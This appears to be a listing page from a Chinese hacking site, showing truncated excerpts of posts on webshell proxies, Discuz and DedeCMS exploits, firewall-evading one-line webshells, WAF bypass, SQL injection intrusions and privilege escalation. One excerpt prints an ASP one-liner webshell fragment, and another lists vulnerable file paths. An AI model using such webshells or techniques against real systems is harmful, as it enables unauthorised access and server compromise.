请花3分钟阅读本协议,访问本站即认同本协议

免责声明

hacker5年前14619
        本站系公益性非盈利IT技术学习普及网,部分文章、信息、图片、等来源于互联网,由互联网收集整理发布,希望传...

只有webshell,一样可以做代理,如何使用脚本程序做代理

hacker4年前915
只有webshell,一样可以做代理,如何使用脚本程序做代理
有时候要代理进内网,但是服务器没有外网端口,也没法执行命令反弹lcx什么的,也没有提权什么什么的,只有一个webshell,这个时候就比较蛋疼了。 鄙人不才,写了一个比较山寨的php...

discuz! x2.5爆路径漏洞及后台拿shell

hacker4年前1813
爆路径文件如下: /uc_server/control/admin/db.php /source/plugin/myrepeats/table/table_myrepeats.php /in...

各种过安全狗一句话木马asp,php,aspx一句话

hacker4年前1242
几个变性的asp–过防火墙 过狗效果都不错 <%Y=request(“x”)%> <%execute(Y)%> < %eval (eval(chr(114)+chr(...

黑客攻击电子邮件常用方法

hacker4年前728
黑客攻击电子邮件常用方法:毫无疑问,电子邮件是当今世界上使用最频繁的商务通信工具,据可靠统计显示,目前全球每天的电子邮件发送量已超过500亿条,预计到2008年该数字将增长一倍。 电子邮件的持续升温...

Webscan360的防御与绕过

hacker4年前693
Webscan360的防御与绕过
这两天给360做了一个webscan360的总结,结果补丁还没有出来,就被人公布到了91org上面,既然公开了,那我就做一个总结 首先我们贴上它最新的防御正则 \<.+javascr...

黑客技术入门

hacker4年前804
黑客是需要不断学习的,一旦网上出现了新的技术,黑客就有了新的工作,他们必须在很短的时间内了解该技术的最基本的进程,这里说的 就是掌握干技术的核心技巧,,深入的了解该程序的运转,如果一个黑客停止了对...

DedeCMS会员中心短消息SQL注射0day漏洞

hacker4年前1064
需要:magic_quotes_gpc = Off DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码: http://www.chncto.com/de/membe...

黑帽往事:电影网站作弊提高排名日收入过万

hacker4年前703
黑帽往事:电影网站作弊提高排名日收入过万
一家黑帽电影网站,通过垃圾站+挂黑链方式,进行黑帽seo,从而提高百度排名,可实现日收入过万。这家黑帽作弊网站,实际是一家名为“碟民网”的电影网站,通过站长工具查询该网站的百度权重,可发现此网站的...

SQL注入渗透某网络安全公司的网站全过程

hacker4年前1023
SQL注入渗透某网络安全公司的网站全过程
笔者一直都有经常性地到一些安全方面的网站瞎逛的习惯的,最近因为一次机缘巧合之下通过链接来到广州某个颇有名气的网络安全公司的网站。说实在的,这个网站好象挺多元化的,提供软件下载之余,还有自己的论坛(...

详解webshell提权服务器的21种方法

hacker4年前901
详解webshell提权服务器的21种方法
详解webshell提权服务器的21种方法 1.radmin连接法   条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去...